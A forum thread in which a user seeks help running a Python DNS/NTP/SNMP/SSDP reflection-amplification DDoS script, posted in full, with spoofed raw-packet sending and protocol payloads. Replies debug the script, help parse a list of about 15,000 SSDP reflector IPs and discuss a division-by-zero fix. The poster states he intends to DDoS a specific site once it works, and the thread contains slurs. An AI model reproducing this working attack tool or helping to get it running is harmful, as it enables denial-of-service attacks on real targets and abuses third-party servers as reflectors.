User Controls
Someone help me get this thing going.
-
2015-10-20 at 6:47 PM UTCSo i was messing around with this amplification script i found and after installing the dependecies
i tried to run it. One of it's dependencies with pinject and the script said at the top:
from pinject import IP,UDP
But that gave an error so i simply changed it to:
import pinject
It ran but after passing the proper arguments and such i got a new error.
Traceback (most recent call last):
File "C:\Python27\lib\threading.py", line 810, in __bootstrap_inner
self.run()
File "C:\Python27\lib\threading.py", line 763, in run
self.__target(*self.__args, **self.__kwargs)
File "C:\PentestBox\bin\amplify.py", line 266, in __attack
size, _ = self.GetAmpSize(proto, soldier)
File "C:\PentestBox\bin\amplify.py", line 199, in GetAmpSize
sock.sendto(packet, (soldier, PORT[proto]))
gaierror: [Errno 11004] getaddrinfo failed
An error in my threading lib? I don't know what's going on maybe you can help me out?
Here's the script i'm trying to run.
#!/usr/bin/env python
import sys
import time
import socket
import struct
import threading
from random import randint
from optparse import OptionParser
import pinject
#from pinject import IP, UDP
USAGE = '''
%prog target.com [options] # DDoS
%prog benchmark [options] # Calculate AMPLIFICATION factor
'''
LOGO = r'''
_____ __ __
/ ___/____ _____/ /___/ /___ _____ ___
\__ \/ __ `/ __ / __ / __ `/ __ `__ \
___/ / /_/ / /_/ / /_/ / /_/ / / / / / /
/____/\__,_/\__,_/\__,_/\__,_/_/ /_/ /_/
https://github.com/OffensivePython/Saddam
https://twitter.com/OffensivePython
'''
HELP = (
'DNS Amplification File and Domains to Resolve (e.g: dns.txt:[evildomain.com|domains_file.txt]',
'NTP Amplification file',
'SNMP Amplification file',
'SSDP Amplification file',
'Number of threads (default=1)' )
OPTIONS = (
(('-d', '--dns'), dict(dest='dns', metavar='FILE:FILE|DOMAIN', help=HELP[0])),
(('-n', '--ntp'), dict(dest='ntp', metavar='FILE', help=HELP[1])),
(('-s', '--snmp'), dict(dest='snmp', metavar='FILE', help=HELP[2])),
(('-p', '--ssdp'), dict(dest='ssdp', metavar='FILE', help=HELP[3])),
(('-t', '--threads'), dict(dest='threads', type=int, default=1, metavar='N', help=HELP[4])) )
BENCHMARK = (
'Protocol'
'| IP Address '
'| Amplification '
'| Domain '
'\n{}').format('-'*75)
ATTACK = (
' Sent '
'| Traffic '
'| Packet/s '
'| Bit/s '
'\n{}').format('-'*63)
PORT = {
'dns': 53,
'ntp': 123,
'snmp': 161,
'ssdp': 1900 }
PAYLOAD = {
'dns': ('{}\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01'
'{}\x00\x00\xff\x00\xff\x00\x00\x29\x10\x00'
'\x00\x00\x00\x00\x00\x00'),
'snmp':('\x30\x26\x02\x01\x01\x04\x06\x70\x75\x62\x6c'
'\x69\x63\xa5\x19\x02\x04\x71\xb4\xb5\x68\x02\x01'
'\x00\x02\x01\x7F\x30\x0b\x30\x09\x06\x05\x2b\x06'
'\x01\x02\x01\x05\x00'),
'ntp':('\x17\x00\x02\x2a'+'\x00'*4),
'ssdp':('M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n'
'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n')
}
amplification = {
'dns': {},
'ntp': {},
'snmp': {},
'ssdp': {} } # Amplification factor
FILE_NAME = 0 # Index of files names
FILE_HANDLE = 1 # Index of files descriptors
npackets = 0 # Number of packets sent
nbytes = 0 # Number of bytes reflected
files = {} # Amplifications files
SUFFIX = {
0: '',
1: 'K',
2: 'M',
3: 'G',
4: 'T'}
def Calc(n, d, unit=''):
i = 0
r = float(n)
while r/d>=1:
r = r/d
i+= 1
return '{:.2f}{}{}'.format(r, SUFFIX[i], unit)
def GetDomainList(domains):
domain_list = []
if '.TXT' in domains.upper():
file = open(domains, 'r')
content = file.read()
file.close()
content = content.replace('\r', '')
content = content.replace(' ', '')
content = content.split('\n')
for domain in content:
if domain:
domain_list.append(domain)
else:
domain_list = domains.split(',')
return domain_list
def Monitor():
'''
Monitor attack
'''
print ATTACK
FMT = '{:^15}|{:^15}|{:^15}|{:^15}'
start = time.time()
while True:
try:
current = time.time() - start
bps = (nbytes*8)/current
pps = npackets/current
out = FMT.format(Calc(npackets, 1000),
Calc(nbytes, 1024, 'B'), Calc(pps, 1000, 'pps'), Calc(bps, 1000, 'bps'))
sys.stderr.write('\r{}{}'.format(out, ' '*(60-len(out))))
time.sleep(1)
except KeyboardInterrupt:
print '\nInterrupted'
break
except Exception as err:
print '\nError:', str(err)
break
def AmpFactor(recvd, sent):
return '{}x ({}B -> {}B)'.format(recvd/sent, sent, recvd)
def Benchmark(ddos):
print BENCHMARK
i = 0
for proto in files:
f = open(files[proto][FILE_NAME], 'r')
while True:
soldier = f.readline().strip()
if soldier:
if proto=='dns':
for domain in ddos.domains:
i+= 1
recvd, sent = ddos.GetAmpSize(proto, soldier, domain)
if recvd/sent:
print '{:^8}|{:^15}|{:^23}|{}'.format(proto, soldier,
AmpFactor(recvd, sent), domain)
else:
continue
else:
recvd, sent = ddos.GetAmpSize(proto, soldier)
print '{:^8}|{:^15}|{:^23}|{}'.format(proto, soldier,
AmpFactor(recvd, sent), 'N/A')
i+= 1
else:
break
print 'Total tested:', i
f.close()
class DDoS(object):
def __init__(self, target, threads, domains, event):
self.target = target
self.threads = threads
self.event = event
self.domains = domains
def stress(self):
for i in range(self.threads):
t = threading.Thread(target=self.__attack)
t.start()
def __send(self, sock, soldier, proto, payload):
'''
Send a Spoofed Packet
'''
udp = UDP(randint(1, 65535), PORT[proto], payload).pack(self.target, soldier)
ip = IP(self.target, soldier, udp, proto=socket.IPPROTO_UDP).pack()
sock.sendto(ip+udp+payload, (soldier, PORT[proto]))
def GetAmpSize(self, proto, soldier, domain=''):
'''
Get Amplification Size
'''
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)
data = ''
if proto in ['ntp', 'ssdp']:
packet = PAYLOAD[proto]
sock.sendto(packet, (soldier, PORT[proto]))
try:
while True:
data+= sock.recvfrom(65535)[0]
except socket.timeout:
sock.close()
return len(data), len(packet)
if proto=='dns':
packet = self.__GetDnsQuery(domain)
else:
packet = PAYLOAD[proto]
try:
sock.sendto(packet, (soldier, PORT[proto]))
data, _ = sock.recvfrom(65535)
except socket.timeout:
data = ''
finally:
sock.close()
return len(data), len(packet)
def __GetQName(self, domain):
'''
QNAME A domain name represented as a sequence of labels
where each label consists of a length
octet followed by that number of octets
'''
labels = domain.split('.')
QName = ''
for label in labels:
if len(label):
QName += struct.pack('B', len(label)) + label
return QName
def __GetDnsQuery(self, domain):
id = struct.pack('H', randint(0, 65535))
QName = self.__GetQName(domain)
return PAYLOAD['dns'].format(id, QName)
def __attack(self):
global npackets
global nbytes
_files = files
for proto in _files: # Open Amplification files
f = open(_files[proto][FILE_NAME], 'r')
_files[proto].append(f) # _files = {'proto':['file_name', file_handle]}
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
i = 0
while self.event.isSet():
for proto in _files:
soldier = _files[proto][FILE_HANDLE].readline().strip()
if soldier:
if proto=='dns':
if not amplification[proto].has_key(soldier):
amplification[proto][soldier] = {}
for domain in self.domains:
if not amplification[proto][soldier].has_key(domain):
size, _ = self.GetAmpSize(proto, soldier, domain)
if size==0:
break
elif size<len(PAYLOAD[proto]):
continue
else:
amplification[proto][soldier][domain] = size
amp = self.__GetDnsQuery(domain)
self.__send(sock, soldier, proto, amp)
npackets += 1
i+=1
nbytes += amplification[proto][soldier][domain]
else:
if not amplification[proto].has_key(soldier):
size, _ = self.GetAmpSize(proto, soldier)
if size<len(PAYLOAD[proto]):
continue
else:
amplification[proto][soldier] = size
amp = PAYLOAD[proto]
npackets += 1
i+=1
nbytes += amplification[proto][soldier]
self.__send(sock, soldier, proto, amp)
else:
_files[proto][FILE_HANDLE].seek(0)
sock.close()
for proto in _files:
_files[proto][FILE_HANDLE].close()
def main():
parser = OptionParser(usage=USAGE)
for args, kwargs in OPTIONS:
parser.add_option(*args, **kwargs)
options, args = parser.parse_args()
domains = None
if len(args)<1:
parser.print_help()
sys.exit()
if options.dns:
dns_file, domains = options.dns.split(':')
domains = GetDomainList(domains)
if domains:
files['dns'] = [dns_file]
else:
print 'Specify domains to resolve (e.g: --dns=dns.txt:evildomain.com)'
sys.exit()
if options.ntp:
files['ntp'] = [options.ntp]
if options.snmp:
files['snmp'] = [options.snmp]
if options.ssdp:
files['ssdp'] = [options.ssdp]
if files:
event = threading.Event()
event.set()
if 'BENCHMARK'==args[0].upper():
ddos = DDoS(args[0], options.threads, domains, event)
Benchmark(ddos)
else:
ddos = DDoS(socket.gethostbyname(args[0]), options.threads, domains, event)
ddos.stress()
Monitor()
event.clear()
else:
parser.print_help()
sys.exit()
if __name__=='__main__':
print LOGO
main()
Any ideas on what's going wrong? -
2015-10-20 at 11:32 PM UTCwhat error did it throw for from pinject import IP,UDP? if importing those classes specifically failed but importing the full lib worked, there might be something wrong with those particular classes... maybe the version you're using is too old/new and the required classes are named differently or something.
looks like the specific error that's tripping is getaddrinfo failed, though I always have trouble reading Python errors. that would indicate that it's part of the ip connection process failing, again likely pointing at the IP class in pinject -
2015-10-21 at 11:40 AM UTC
what error did it throw for from pinject import IP,UDP? if importing those classes specifically failed but importing the full lib worked, there might be something wrong with those particular classes… maybe the version you're using is too old/new and the required classes are named differently or something.
Traceback (most recent call last):
File "C:\PentestBox\bin\amplify.py", line 10, in <module>
from pinject import IP, UDP
ImportError: cannot import name IP
That's the error i get when i keep the import as the original.
[QUOTE=aldra;n37549
looks like the specific error that's tripping is [b]getaddrinfo failed[/b], though I always have trouble reading Python errors. that would indicate that it's part of the ip connection process failing, again likely pointing at the IP class in pinject
Right, i installed pinject with pip but now i can't find the thing anymore so i can't go look in the script for the offending or rather non existent classes so that sucks.
-
2015-10-21 at 11:48 AM UTCFound pinject on github.
https://github.com/OffensivePython/Pinject/blob/master/pinject.py
If this is the one i got with pip then i should be set... -
2015-10-21 at 3:11 PM UTCSophie mate, you need to really supply me with some of yo Python stuff.
-
2015-10-21 at 3:25 PM UTCyeah, based on that the copy of the library you had was missing the IP class (or it was named something else)... might want to do a quick search through it for the getaddrinfo function to see what it's attached to.
another thing to keep in mind is that python 2 and 3 source files are incompatible with one another (mostly whitespace/formatting faggotry), so you might want to verify your source and libs are written in the same version. -
2015-10-21 at 4:08 PM UTC
Sophie mate, you need to really supply me with some of yo Python stuff.
Nigga' i post metric shit tons of python stuff here in T&T. However if you need something specific one need only ask.yeah, based on that the copy of the library you had was missing the IP class (or it was named something else)… might want to do a quick search through it for the getaddrinfo function to see what it's attached to.
Now to find the damned thing i literally have over 9000 libs.another thing to keep in mind is that python 2 and 3 source files are incompatible with one another (mostly whitespace/formatting faggotry), so you might want to verify your source and libs are written in the same version.
Yes, i work exclusively in 2.7 that they're not cross compatible is gay as fuck. -
2015-10-21 at 4:09 PM UTCNothing to do with threading, the thread lib is always going to be at the top of the stack in a threaded program.
Looking at the source of that github link and what pip has it looks like they're totally different programs. I'd uninstall the pip package and download a local copy from github and use that.
The getaddrinfo is probably due to a bad domain. Try to print out `soldier` and `PORT[proto]` just above line 199, they should be a valid domain or IP and port combo. -
2015-10-21 at 4:27 PM UTCSo here's a twist, turns out the lib i downloaded with pip is unrelated to the lib required by the amp script. The pinject i found on github is the one required by the amp script i put them both in my pentestbox directory and everything is fine. I'm gonna' benchmark with SSDP amp see how much bandwdith i'mma pull.
-
2015-10-21 at 4:44 PM UTC
Nothing to do with threading, the thread lib is always going to be at the top of the stack in a threaded program.
Looking at the source of that github link and what pip has it looks like they're totally different programs. I'd uninstall the pip package and download a local copy from github and use that.
The getaddrinfo is probably due to a bad domain. Try to print out `soldier` and `PORT[proto]` just above line 199, they should be a valid domain or IP and port combo.
Yes you beat me to it. I was about to post this.Fuck me.
Traceback (most recent call last):
File "C:\PentestBox\bin\amplify.py", line 321, in <module>
main()
File "C:\PentestBox\bin\amplify.py", line 309, in main
Benchmark(ddos)
File "C:\PentestBox\bin\amplify.py", line 163, in Benchmark
recvd, sent = ddos.GetAmpSize(proto, soldier)
File "C:\PentestBox\bin\amplify.py", line 198, in GetAmpSize
sock.sendto(packet, (soldier, PORT[proto]))
socket.gaierror: [Errno 11004] getaddrinfo failed
Right so socket.gaierror means the given host name is invalid. ANd if i look at the code in the script i see this:
def GetAmpSize(self, proto, soldier, domain=''):
'''
Get Amplification Size
'''
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)
data = ''
if proto in ['ntp', 'ssdp']:
packet = PAYLOAD[proto]
sock.sendto(packet, (soldier, PORT[proto]))
try:
while True:
data+= sock.recvfrom(65535)[0]
except socket.timeout:
sock.close()
return len(data), len(packet)
[code]
Line 198 is:
[code]
sock.sendto(packet, (soldier, PORT[proto]))
So if i get this right it can't send muh packet defined as PAYLOAD because my hostname in sock.sendto is invalid.Sock is defined in my code as follows:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Which means socket on an IPv4 adress under protocol so and so(I forgot what DGRAM is for at the moment) and sendto is defined elsewhere. But why, does it say my host name is invalid?
God damn it.
But i'll print the stuff you mentioned. -
2015-10-21 at 4:50 PM UTC
Nothing to do with threading, the thread lib is always going to be at the top of the stack in a threaded program.
Looking at the source of that github link and what pip has it looks like they're totally different programs. I'd uninstall the pip package and download a local copy from github and use that.
The getaddrinfo is probably due to a bad domain. Try to print out `soldier` and `PORT[proto]` just above line 199, they should be a valid domain or IP and port combo.
Soldier: 1.169.169.206 308
Port: 1900
Is the result and i'll be darned because that's the first entry in my SSDP amp list and a port which means my amp list is misformatted. Thanks lan [size=7]<3[/size] You rock.
Now someone make me a grep regular expression to pull only the IP's out of muh amp list. -
2015-10-21 at 5:01 PM UTCGot a grep already. Here it is if anyone is interested.
egrep -o "([0-9]{1,3}[.]){3}[0-9]{1,3}" -
2015-10-21 at 5:09 PM UTCNo prob. From within python, assuming the addresses are all IPv4 and have a port listed:
>>> import re >>> s = "1.169.169.206 308\n192.168.0.1 8080"
>>> ips = [re.match('([0-9.]+) (.*)', x).group(1) for x in s.split('\n')]
>>> ips
['1.169.169.206', '192.168.0.1']
>>> -
2015-10-21 at 5:12 PM UTCToo bad my terminal only outputs 1000 lines -_-.
-
2015-10-21 at 5:26 PM UTC
No prob. From within python, assuming the addresses are all IPv4 and have a port listed:
>>> import re >>> s = "1.169.169.206 308\n192.168.0.1 8080"
>>> ips = [re.match('([0-9.]+) (.*)', x).group(1) for x in s.split('\n')]
>>> ips
['1.169.169.206', '192.168.0.1']
>>>
What is this going to do exactly? Match up SSDP IPs with a local IP? Also am i supposed to do this for the 15.000 SSDP IP's i have? Because i'm gonna' need some automation for that. -
2015-10-21 at 6 PM UTC
Nigga' i post metric shit tons of python stuff here in T&T. However if you need something specific one need only ask.
Well, if you'd be down to help me code a Fallout terminal thing, I need to know because I barely know Python. -
2015-10-21 at 6:04 PM UTC
Well, if you'd be down to help me code a Fallout terminal thing, I need to know because I barely know Python.
>fallout terminal thing
Gonna' need to be a little more specific than that. What do you need it to do? -
2015-10-21 at 6:22 PM UTC
>fallout terminal thing
Gonna' need to be a little more specific than that. What do you need it to do?
Look under my Fallout 3 PipBoy in DIY I might've explained it in there. -
2015-10-21 at 6:30 PM UTC
Look under my Fallout 3 PipBoy in DIY I might've explained it in there.
Alright. -
2015-10-21 at 9:19 PM UTCOk so after arranging a better formatted SSDP server list i got benchmarking to work.
It calculates the amplification factor in this mode and as you can see not a lot of that going on but i'll chalk that up to shitty servers in my list. However after i configured a proper target to fire my laz0rz at it threw a:
[SIZE=48px]DIVISION BY ZERO![/SIZE]
Error. Instantly after that the Universe impoded but after reconfiguring the space-time continuüm i was able to go to github and github told me the following.
'From line 124 to 130:'
start = time.time()
while True:
try:
current = time.time()
start bps = (nbytes*8) / current pps = npackets/current
when this chunk of code gets executed fast enough, current is 0 and python throws and exception about float division error.
example Solution: setting current to non-zero value eg. 1 when it is 0.
Now my question obviously is, how do i set 'the current to non-zero value eg. 1 when it is 0.'
When this finally works i'm gonna' DDoS LLZ to celebrate.
